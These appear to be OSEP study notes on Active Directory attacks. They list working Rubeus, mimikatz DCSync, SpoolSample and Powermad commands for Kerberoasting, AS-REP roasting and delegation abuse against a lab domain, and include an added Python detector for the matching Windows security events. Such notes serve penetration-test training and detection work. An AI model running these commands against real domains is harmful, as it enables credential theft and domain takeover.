OSEP Notes

Domain Reconnaissance on Windows

GPO

Check for GPOs that grant a group of users remote access (PsExec, WMI, WinRM, RDP, etc.) to specific hosts.

Kerberoasting

rubeus.exe kerberoast /user:svc_sql /nowrap

ASREPRoasting

rubeus.exe asreproast /format:hashcat /user:svc_sql /nowrap

Unconstrained Delegation

rubeus.exe monitor /interval:1 /filtuser:reddc$ /nowrap

Spoolsample.exe reddc redsqlw

rubeus.exe ptt /ticket:[ticket]

mimikatz # lsadump::dcsync /domain:red.com /user:RED\administrator

Constrained Delegation

rubeus.exe tgtdeleg /nowrap

rubeus.exe s4u /impersonate:kevin /user:svc_sql /domain:red.local /msdsspn:time/redwebaw.red.com /altservice:cifs,host,http,winrm /ticket:[ticket] /dc:reddc.red.com /ptt

Resource Based Constrained Delegation

ipmo .\powermad.ps1

New-MachineAccount -MachineAccount my -Password $(ConvertTo-SecureString '123' -AsPlainText -Force)

ipmo .\Microsoft.ActiveDirectory.Management.dll

Set-ADComputer red09 -PrincipalsAllowedToDelegateToAccount my$ -Server [DC IP] -Verbose

rubeus.exe s4u /user:my$ /rc4:…… /impersonateuser:administrator /msdsspn:CIFS/red09.red.com /ptt
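The following is an added defender-side example, not part of the original notes, covering the Kerberoasting, ASREPRoasting and Resource Based Constrained Delegation sections above from the detection side. It assumes Windows Security events 4769 (TGS request), 4768 (TGT request), 4741 (computer account created) and 5136 (directory object modified) have been exported and reduced to the EventData fields named in the code; the event records below are constructed samples that reuse the names from these notes (svc_sql, reddc, red09, my$, red.com) together with made-up users such as bob and alice.

```python
from collections import defaultdict
from dataclasses import dataclass

# Minimal representation of one Windows Security event (constructed sample data,
# not an export): the event id plus a dict of the EventData fields we care about.
@dataclass
class Event:
    event_id: int
    fields: dict

RC4_ETYPE = "0x17"                                   # TicketEncryptionType for RC4-HMAC
RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
KERBEROAST_THRESHOLD = 3  # distinct RC4 service tickets per account before we flag it

def find_kerberoast(events):
    """4769: one account requesting RC4 (0x17) service tickets for many distinct SPN accounts."""
    by_user = defaultdict(set)
    for ev in events:
        if ev.event_id == 4769 and ev.fields.get("TicketEncryptionType") == RC4_ETYPE:
            svc = ev.fields["ServiceName"]
            # machine accounts and krbtgt are noise here; roasting targets user SPNs
            if not svc.endswith("$") and svc != "krbtgt":
                by_user[ev.fields["TargetUserName"]].add(svc)
    return {user: sorted(svcs) for user, svcs in by_user.items()
            if len(svcs) >= KERBEROAST_THRESHOLD}

def find_asreproast(events):
    """4768: TGT issued with PreAuthType 0 (no pre-authentication) and an RC4 ticket."""
    return sorted({ev.fields["TargetUserName"] for ev in events
                   if ev.event_id == 4768
                   and ev.fields.get("PreAuthType") == "0"
                   and ev.fields.get("TicketEncryptionType") == RC4_ETYPE})

def find_rbcd_writes(events):
    """5136: flag any write to the RBCD attribute on a directory object (needs an object SACL)."""
    return [(ev.fields["SubjectUserName"], ev.fields["ObjectDN"]) for ev in events
            if ev.event_id == 5136
            and ev.fields.get("AttributeLDAPDisplayName") == RBCD_ATTR]

def find_new_machine_accounts(events, admins):
    """4741: computer account created by someone outside the expected admin set
    (i.e. a regular user spending ms-DS-MachineAccountQuota)."""
    return [(ev.fields["SubjectUserName"], ev.fields["TargetUserName"]) for ev in events
            if ev.event_id == 4741 and ev.fields["SubjectUserName"] not in admins]

# Constructed sample events (hypothetical users bob/alice/svc_legacy/admin).
SAMPLE_EVENTS = [
    Event(4769, {"TargetUserName": "bob@RED.COM", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"}),
    Event(4769, {"TargetUserName": "bob@RED.COM", "ServiceName": "svc_web", "TicketEncryptionType": "0x17"}),
    Event(4769, {"TargetUserName": "bob@RED.COM", "ServiceName": "svc_backup", "TicketEncryptionType": "0x17"}),
    Event(4769, {"TargetUserName": "bob@RED.COM", "ServiceName": "REDDC$", "TicketEncryptionType": "0x17"}),  # ignored
    Event(4769, {"TargetUserName": "alice@RED.COM", "ServiceName": "svc_sql", "TicketEncryptionType": "0x12"}),  # AES, normal
    Event(4768, {"TargetUserName": "svc_legacy", "PreAuthType": "0", "TicketEncryptionType": "0x17"}),
    Event(4768, {"TargetUserName": "alice", "PreAuthType": "2", "TicketEncryptionType": "0x12"}),
    Event(4741, {"SubjectUserName": "bob", "TargetUserName": "MY$"}),
    Event(5136, {"SubjectUserName": "bob", "ObjectDN": "CN=RED09,CN=Computers,DC=red,DC=com",
                 "AttributeLDAPDisplayName": RBCD_ATTR}),
    Event(5136, {"SubjectUserName": "admin", "ObjectDN": "CN=RED09,CN=Computers,DC=red,DC=com",
                 "AttributeLDAPDisplayName": "description"}),  # unrelated attribute, ignored
]

ADMINS = frozenset({"administrator", "admin"})

def triage(events=SAMPLE_EVENTS, admins=ADMINS):
    """Run all four checks and return one dict of findings."""
    return {
        "kerberoast": find_kerberoast(events),
        "asreproast": find_asreproast(events),
        "rbcd_writes": find_rbcd_writes(events),
        "new_machine_accounts": find_new_machine_accounts(events, admins),
    }

if __name__ == "__main__":
    for name, hits in triage().items():
        print(f"{name}: {hits}")
```

The four findings on the sample line up with the note's own steps: bob burns three RC4 service tickets, svc_legacy has pre-auth disabled, bob creates MY$ and then writes the RBCD attribute on RED09. Two caveats for real data: 5136 only fires if the computer objects carry a SACL for attribute writes, and AES-only environments should lower or invert the RC4 filter, since there the interesting signal is any 0x17 ticket at all.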

Internal Web Service

If it is not directly reachable, access it through a SOCKS proxy.

Look for computer or user names containing "web", "svc", etc.

Send a phishing email

Send a document

Execute command

Ping a host

DevOps


Last updated 1 year ago